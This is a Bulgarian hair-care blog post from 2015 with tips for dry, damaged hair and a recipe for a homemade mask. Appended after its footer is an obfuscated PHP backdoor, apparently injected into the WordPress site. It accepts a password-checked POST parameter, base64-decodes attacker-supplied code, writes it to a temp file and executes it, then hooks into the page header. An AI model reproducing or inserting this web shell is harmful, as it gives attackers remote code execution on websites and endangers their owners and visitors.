Как да се справим с увредената коса: съвети + рецепта за маска | Косопад

Как да се справим с увредената коса: съвети + рецепта за маска

kosa-uvredena-1

Постоянно боядисване, изправяне с преса, използване на сешоар… много от нещата, които правим, за да сме по- красиви, всъщност правят косата ни слаба. Тя става суха, къса се лесно, цъфти и няма блясък. Как да я върнем към живот?

Косата ни ежедневно е изложена на фактори, които я увреждат. Тя самата обаче няма механизми, за да се защити от тях. Трябва да го направим ние. Когато косъмът отслабне, косата губи виталност, блясък, здравина. Става суха и се къса лесно. Косопадът е неминуем.

Но не само външни са факторите, които влияят върху състоянието й. Дефицит на хранителни вещества, болест, стрес – всичко това се отразява на косата.

kosa-uvredena

Как да се справим с увредената коса?

Първо, трябва да открием причината, която отслабва косата ни: дали прекаляваме с пресата, дали прекаляваме със сешоара, дали сме на строга диета. Трябва да се справим както с външните, така и с вътрешните фактори.

Когато косата ви е суха, е абсурдно да я миете всеки ден. Използвайте мек шампоан, който съдържа полезни вещества и не е агресивен.

Много е важно да плакнете косата хубаво. Така ще отмиете всички остатъци от шампоана, вместо да се натрупват в корените. Добре е последното плакнене да е със студена или хладка вода.

Важно е косата да се хидратира добре, за да се възстанови. Маслото от карите е много добър вариант. Добре е да я хидратирате вечер.

За да имате здрава и красива коса, храненето ви трябва да е здравословно и разнообразно, за да приемате полезни вещества. Важно е да съдържа пилешко, риба, плодове и зеленчуци.

Бирената мая е много полезна, защото е изключително богата на витамин В. Може да я пиете като хранителна добавка два месеца или да я нанасяте директно върху косата, разредена с вода.

Домашна маска

-1 яйце
-1/4 чаша ябълков оцет
-1/4 чаша мед
-1/2 чаша зехтин

Смесете добре съставките. След това нанесете за 30 минути, преди да измиете с шампоана.

02. ноември 2015 21:57:22 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}